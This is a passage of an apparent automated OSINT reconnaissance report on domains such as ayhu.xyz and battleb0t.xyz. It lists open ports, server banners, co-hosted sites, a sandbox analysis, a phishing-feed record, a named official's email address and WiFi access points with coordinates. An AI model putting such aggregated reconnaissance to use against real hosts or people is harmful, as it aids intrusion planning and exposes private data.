div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark .expandable.expanded{border-left-color:#4693ff}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{text-decoration:underline;color:#ee730a}body.light .lds-ring div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{border-color:#003681;background-color:#003681;color:#fff}body.light .expandable.expanded{border-left-color:#0051c3} | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | message_me (Category: social)
https://mssg.me/login | login |
| 2023-05-12 02:54:51 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06V19Y9J57EVG1E6053DPH4
Date: <REDACTED>
Content-Length: 0
| 34.74.170.74 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 00ffcc.cn | 00ffcc.cn |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00cybermonk00.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:B1) | 41.8781, -87.6298 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | sheila.christianson@ftb.ca.gov | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6236_1468670677\\shopping.js]- [targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:8080 | 188.114.96.0/24 |
| 2023-05-12 03:24:22 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 03:10:03 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | netcraft.com | baffin.netcraft.com |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 8.9p1 | 46.101.229.70 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5c82adbc7b2323-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 4 | 0 | 2 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:C5:DB:8B:88) | 37.7642, -122.3993 |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:8443 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BLINK-6985 (Net ID: 00:03:7F:A1:AE:79) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.128.0/20 | 172.67.135.9 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:02:05) | 50.8897, 6.0563 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 1 | 0 | 2 | 0 | None | [{u'page_text': None, u'domain': u'ecloanmoney.com', u'virus_total': u'Yes', u'n_times_seen_ip': 0, u'abuse_contact': u'abuse@ecloanmoney.com', u'ip': u'104.21.6.166', u'google_safebrowsing': u'Yes', u'threat_crowd': u'Yes', u'n_times_seen_domain': 0, u'alexa_rank_host': None, u'id': 8064681, u'city': u'', u'abuse_ch_malware': u'No', u'countrycode': u'US', u'title': u'Not Acceptable!', u'ssl_subject': None, u'technology': None, u'date_update': u'2022-01-16T13:03:33.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': 4.5, u'vulns': None, u'latitude': u'37.7510', u'regionname': u'', u'hash': u'16279a2e936344880462a47af65885b3a095b205bf036efd2e68751b3aa57f5b', u'threat_crowd_subdomain_count': 0, u'screenshot': None, u'n_times_seen_host': 0, u'ssl_issuer': None, u'domain_registered_n_days_ago': 399, u'regioncode': u'', u'host': u'ecloanmoney.com', u'date': u'2022-01-16T12:11:21.000Z', u'asn': u'AS13335', u'tags': u'cdn', u'bgp': u'104.16.0.0/12', u'url': u'https://ecloanmoney.com/dhl/card.php', u'isp': u'CLOUDFLARENET, US', u'longitude': u'-97.8220', u'ports': u'80, 443, 2086, 2087, 2096, 8080, 8443', u'countryname': u'United States', u'threat_crowd_votes': u'Suspicious', u'http_server': None, u'tld': u'com', u'os': None, u'http_code': 403}] | 104.21.6.166 |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5oVgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'QLdIKmVk90yEleUYFE8hq2th+l+jM4Uner6m/PqgQtgOm/j9Wu0B6Nwve/VIS31m9W0lb1V8I9RlPI3LD6ZpGikA+cl1xSe9juPQwbg/Khf2e9vfPpLKN0X7UvbusnivZuKA6TGjro8M7MljUWp3taWc0NTFEoxbvZYXtf23gnOsGXD0P3fio4y3xX1t0tyqoIYWkX6yVqHvCXS1I5Mc00CNY00FBcI/7efFMNVH6yXhbtO4DyojjSzFMA05WgLv1NMq/SwjeKgTF2UQjV1ScyP6xlwF4X/SOwW0/jc9ATHtwcZox/DXcQhTbYvzRGwtclm7F8sB4NPhEbop1gXy97S6V5xE84j90At9GihMuWgC3j9pOQviCNo3sewEE1wcCPBex3qLyb9lbO0GI3TZ/lO3ce3eYjSncgsTFzLP72SeeH7Cmkp5RZNQKUNY6KsNqv0SoqAADgpekKlGL1tqVOG6O7u3V3DisK9MR45AkotpTXq8Qr9XZQjfqaCO5Yfbn8lV1zfjI7l05/9wUrB6DYoT7pc7b3AgDm+BZdc44QE9FZKV/xPKQptYvP3Z+ZLT',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5a3bb81a1b');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5a3bb81a1b';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | fluid.battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.116): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.191): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/jcqn.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00nave198.github.io |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.97.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:0B:63:00:0B) | 41.8781, -87.6298 |
| 2023-05-12 02:54:07 | Physical Location | No | Censys | 1 | 0 | 2 | 0 | None | Rosemont, Illinois, 60018, United States, North America | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", 